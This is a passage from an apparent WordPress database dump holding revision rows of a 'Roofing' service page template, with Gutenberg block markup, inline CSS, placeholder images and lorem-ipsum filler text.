class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"def72a87-1610-4fc9-a370-2cf60e269aaf\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-def72a87-1610-4fc9-a370-2cf60e269aaf background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"96429a2e-3388-4b55-89c4-2dd705e812be\"} -->\n<style type=\"text/css\"> .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-96429a2e-3388-4b55-89c4-2dd705e812be skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"cc186dce-7df5-4408-99f7-0ea688547585\"} -->\n<style type=\"text/css\"> .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cc186dce-7df5-4408-99f7-0ea688547585\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"334434c2-eb1d-4f26-aa79-706899ee7894\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-334434c2-eb1d-4f26-aa79-706899ee7894\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','inherit','closed','closed','','263-revision-v1','','','2022-08-22 19:22:20','2022-08-22 19:22:20','',263,'https://cteisys.com/?p=370',0,'revision','',0),(368,1,'2022-08-22 19:20:12','2022-08-22 19:20:12','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"945e453c-85ca-4f75-9bd5-b8e8dc9274eb\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-945e453c-85ca-4f75-9bd5-b8e8dc9274eb.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"52f2b85a-f1ae-4ee3-813c-3e033641180e\"} -->\n<style type=\"text/css\"> .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-52f2b85a-f1ae-4ee3-813c-3e033641180e .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-52f2b85a-f1ae-4ee3-813c-3e033641180e skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"fa65fe9f-9549-4cfd-9b97-dc914e202db5\"} -->\n<style type=\"text/css\"> .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fa65fe9f-9549-4cfd-9b97-dc914e202db5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fa65fe9f-9549-4cfd-9b97-dc914e202db5\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"72a74329-ab16-4b02-82c4-a618f9b2a974\"} -->\n<style type=\"text/css\"> .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72a74329-ab16-4b02-82c4-a618f9b2a974 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72a74329-ab16-4b02-82c4-a618f9b2a974\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-65d5fbbf-a35c-4a8e-89c0-ffed3eae72b1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0af77322-dee6-4594-9ea0-061dbc66bd6d\"} -->\n<style type=\"text/css\"> .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0af77322-dee6-4594-9ea0-061dbc66bd6d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0af77322-dee6-4594-9ea0-061dbc66bd6d skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"67f4f5d4-b5cf-437f-a560-cbf35cd52f7d\"} 